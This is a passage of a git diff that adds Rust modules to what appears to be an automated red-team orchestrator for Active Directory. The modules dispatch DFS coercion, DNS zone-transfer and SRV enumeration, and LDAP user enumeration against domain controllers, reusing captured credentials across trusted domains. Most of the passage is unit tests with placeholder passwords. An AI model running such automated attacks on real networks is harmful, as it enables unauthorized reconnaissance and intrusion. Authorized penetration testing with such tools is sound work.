+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = DfsWork {
+ dedup_key: "dfs_coerce:192.168.58.10".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ listener: "192.168.58.50".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.dedup_key, "dfs_coerce:192.168.58.10");
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.listener, "192.168.58.50");
+ assert_eq!(work.credential.username, "testuser");
+ }
+
+ #[test]
+ fn self_targeting_prevention() {
+ let listener = "192.168.58.50";
+ let dc_ips = ["192.168.58.10", "192.168.58.50", "192.168.58.20"];
+
+ let non_self: Vec<&&str> = dc_ips.iter().filter(|ip| **ip != listener).collect();
+
+ assert_eq!(non_self.len(), 2);
+ assert!(!non_self.contains(&&"192.168.58.50"));
+ assert!(non_self.contains(&&"192.168.58.10"));
+ assert!(non_self.contains(&&"192.168.58.20"));
+ }
+
+ #[test]
+ fn domain_extraction_for_credential_match() {
+ let domain = "contoso.local";
+ let cred_domain = "CONTOSO.LOCAL";
+ assert_eq!(
+ cred_domain.to_lowercase(),
+ domain.to_lowercase(),
+ "Domain matching should be case-insensitive"
+ );
+
+ let domain2 = "fabrikam.local";
+ assert_ne!(
+ cred_domain.to_lowercase(),
+ domain2.to_lowercase(),
+ "Different domains should not match"
+ );
+ }
+
+ // --- collect_dfs_coercion_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_dcs_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_dc_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "dfs_coerce:192.168.58.10");
+ assert_eq!(work[0].listener, "192.168.58.50");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_dc_matching_listener() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.50".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into());
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_dcs_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "crossuser");
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into());
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/dns_enum.rs b/ares-cli/src/orchestrator/automation/dns_enum.rs
new file mode 100644
index 00000000..8d3e5bc7
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/dns_enum.rs
@@ -0,0 +1,398 @@
+//! auto_dns_enum -- DNS zone transfer and record enumeration.
+//!
+//! Attempts AXFR zone transfers and enumerates DNS records (SRV, A, CNAME)
+//! from each discovered DC. DNS records reveal additional hosts, services,
+//! and naming conventions that port scanning alone may miss.
+//!
+//! Zone transfers are often allowed from domain-joined machines, and even
+//! when blocked, DNS SRV record enumeration reveals AD-registered services
+//! (e.g., _msdcs, _kerberos, _ldap, _gc, _http).
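+//!
+//! For a domain `contoso.local`, standard AD SRV registrations include, for
+//! example, `_ldap._tcp.dc._msdcs.contoso.local`,
+//! `_kerberos._tcp.contoso.local`, and `_gc._tcp.contoso.local`.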
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect DNS enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_dns_enum` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_dns_enum_work(state: &StateInner) -> Vec<DnsEnumWork> {
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("dns_enum:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_DNS_ENUM, &dedup_key) {
+ continue;
+ }
+
+ // DNS enumeration works unauthenticated (zone transfers, SRV queries),
+ // but pass a same-domain credential when available for authenticated lookups.
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !c.password.is_empty() && c.domain.to_lowercase() == domain.to_lowercase())
+ .cloned();
+
+ items.push(DnsEnumWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// DNS enumeration per domain.
+/// Interval: 45s.
+pub async fn auto_dns_enum(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("dns_enum") {
+ continue;
+ }
+
+ let work: Vec<DnsEnumWork> = {
+ let state = dispatcher.state.read().await;
+ collect_dns_enum_work(&state)
+ };
+
+ for item in work {
+ let mut payload = json!({
+ "technique": "dns_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ });
+
+ if let Some(ref cred) = item.credential {
+ payload["credential"] = json!({
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ });
+ }
+
+ let priority = dispatcher.effective_priority("dns_enum");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "DNS enumeration dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_DNS_ENUM, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_DNS_ENUM, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "DNS enumeration deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch DNS enumeration");
+ }
+ }
+ }
+ }
+}
+
+struct DnsEnumWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: Option<ares_core::models::Credential>,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("dns_enum:{}", "contoso.local");
+ assert_eq!(key, "dns_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("dns_enum:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "dns_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_DNS_ENUM, "dns_enum");
+ }
+
+ #[test]
+ fn no_cred_required() {
+ // DNS enum works without credentials for zone transfer / SRV queries
+ let cred: Option<ares_core::models::Credential> = None;
+ assert!(cred.is_none());
+ }
+
+ #[test]
+ fn payload_without_cred() {
+ let payload = serde_json::json!({
+ "technique": "dns_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ });
+ assert!(payload.get("credential").is_none());
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let payload = serde_json::json!({
+ "technique": "dns_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ });
+ assert_eq!(payload["technique"], "dns_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn payload_with_credential() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let mut payload = serde_json::json!({
+ "technique": "dns_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ });
+ payload["credential"] = serde_json::json!({
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ });
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let work = DnsEnumWork {
+ dedup_key: "dns_enum:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: None,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert!(work.credential.is_none());
+ }
+
+ #[test]
+ fn work_struct_with_credential() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = DnsEnumWork {
+ dedup_key: "dns_enum:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: Some(cred),
+ };
+ assert!(work.credential.is_some());
+ assert_eq!(work.credential.unwrap().username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_domain_based() {
+ let domain1 = "contoso.local";
+ let domain2 = "fabrikam.local";
+ let key1 = format!("dns_enum:{}", domain1.to_lowercase());
+ let key2 = format!("dns_enum:{}", domain2.to_lowercase());
+ assert_ne!(key1, key2);
+ assert_eq!(key1, "dns_enum:contoso.local");
+ assert_eq!(key2, "dns_enum:fabrikam.local");
+ }
+
+ #[test]
+ fn case_normalization_mixed() {
+ let key = format!("dns_enum:{}", "Contoso.Local".to_lowercase());
+ assert_eq!(key, "dns_enum:contoso.local");
+ }
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_dns_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_no_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert!(work[0].credential.is_none());
+ }
+
+ #[test]
+ fn collect_single_domain_with_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert!(work[0].credential.is_some());
+ assert_eq!(work[0].credential.as_ref().unwrap().username, "admin");
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.mark_processed(DEDUP_DNS_ENUM, "dns_enum:contoso.local".into());
+ let work = collect_dns_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_domains() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_skips_empty_password_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ // Empty password cred should not be selected
+ assert!(work[0].credential.is_none());
+ }
+
+ #[test]
+ fn collect_cred_only_matches_same_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ // Cross-domain cred should NOT be selected (dns_enum only matches same domain)
+ assert!(work[0].credential.is_none());
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "dns_enum:contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert!(work[0].credential.is_some());
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/domain_user_enum.rs b/ares-cli/src/orchestrator/automation/domain_user_enum.rs
new file mode 100644
index 00000000..2dda9eb9
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/domain_user_enum.rs
@@ -0,0 +1,436 @@
+//! auto_domain_user_enum -- explicit per-domain LDAP user enumeration.
+//!
+//! Unlike initial recon (which does broad DC scanning), this module dispatches
+//! targeted LDAP user enumeration per domain using the best available credential.
+//! This fills the gap where a trusted domain's users are not enumerated because
+//! the initial recon agent only has primary-domain credentials.
+//!
+//! Dispatches `ldap_user_enumeration` to the recon role for each domain that
+//! has a DC but hasn't been fully enumerated yet.
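+//!
+//! Example: with only `contoso.local` credentials, a trusted `fabrikam.local`
+//! DC may be discovered but its users never listed; this loop dispatches LDAP
+//! enumeration against the fabrikam DC with the contoso credential, setting
+//! `bind_domain` so the worker binds as the credential's home realm.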
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect user enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_domain_user_enum` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_user_enum_work(state: &StateInner) -> Vec<UserEnumWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("user_enum:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_DOMAIN_USER_ENUM, &dedup_key) {
+ continue;
+ }
+
+ // Prefer a credential from the target domain.
+ // Fall back to any available credential (cross-domain LDAP may work).
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| {
+ c.domain.to_lowercase() == domain.to_lowercase()
+ && !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ state.credentials.iter().find(|c| {
+ !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ }) {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(UserEnumWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dispatches per-domain LDAP user enumeration.
+/// Interval: 45s.
+pub async fn auto_domain_user_enum(
+ dispatcher: Arc<Dispatcher>,
+ mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("domain_user_enumeration") {
+ continue;
+ }
+
+ let work: Vec<UserEnumWork> = {
+ let state = dispatcher.state.read().await;
+ collect_user_enum_work(&state)
+ };
+
+ for item in work {
+ let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase();
+ let mut payload = json!({
+ "technique": "ldap_user_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
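+ // Two filter clauses; the worker is assumed to AND them together (no
+ // explicit `(&...)` wrapper at this layer).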
+ "filters": ["(objectCategory=person)(objectClass=user)"],
+ "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"],
+ });
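+ // A cross-domain credential authenticates against its home realm; tell
+ // the worker which domain the bind credential belongs to (assumed
+ // contract for the `bind_domain` field).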
+ if cross_domain {
+ payload["bind_domain"] = json!(item.credential.domain);
+ }
+
+ let priority = dispatcher.effective_priority("domain_user_enumeration");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ cred_user = %item.credential.username,
+ "Domain user enumeration dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_DOMAIN_USER_ENUM, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_DOMAIN_USER_ENUM, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "Domain user enumeration deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch user enumeration");
+ }
+ }
+ }
+ }
+}
+
+struct UserEnumWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("user_enum:{}", "contoso.local");
+ assert_eq!(key, "user_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_DOMAIN_USER_ENUM, "domain_user_enum");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "ldap_user_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ "filters": ["(objectCategory=person)(objectClass=user)"],
+ "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"],
+ });
+ assert_eq!(payload["technique"], "ldap_user_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn ldap_filter_format() {
+ let filters = ["(objectCategory=person)(objectClass=user)"];
+ assert_eq!(filters.len(), 1);
+ assert!(filters[0].contains("objectCategory=person"));
+ assert!(filters[0].contains("objectClass=user"));
+ }
+
+ #[test]
+ fn ldap_attributes_list() {
+ let attrs = [
+ "sAMAccountName",
+ "description",
+ "memberOf",
+ "userAccountControl",
+ "servicePrincipalName",
+ ];
+ assert_eq!(attrs.len(), 5);
+ assert!(attrs.contains(&"sAMAccountName"));
+ assert!(attrs.contains(&"servicePrincipalName"));
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = UserEnumWork {
+ dedup_key: "user_enum:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("user_enum:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "user_enum:contoso.local");
+ }
+
+ #[test]
+ fn credential_quarantine_check_logic() {
+ // Empty password should be skipped by the credential selection logic
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "".into(),
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ assert!(cred.password.is_empty());
+ }
+
+ #[test]
+ fn cross_domain_credential_fallback() {
+ // When no same-domain cred exists, any cred can be used (cross-domain LDAP)
+ let creds = [ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "fabrikam.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }];
+ let target_domain = "contoso.local";
+ let same_domain = creds.iter().find(|c| {
+ c.domain.to_lowercase() == target_domain.to_lowercase() && !c.password.is_empty()
+ });
+ assert!(same_domain.is_none());
+ let fallback = creds.iter().find(|c| !c.password.is_empty());
+ assert!(fallback.is_some());
+ assert_eq!(fallback.unwrap().domain, "fabrikam.local");
+ }
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_user_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_user_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_with_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_user_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_DOMAIN_USER_ENUM, "user_enum:contoso.local".into());
+ let work = collect_user_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_cross_domain_fallback() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only fabrikam cred available, should fall back
+ state
+ .credentials
+ .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_user_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "crossuser");
+ assert_eq!(work[0].credential.domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_skips_empty_password() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_user_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_quarantined_credential_falls_back() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
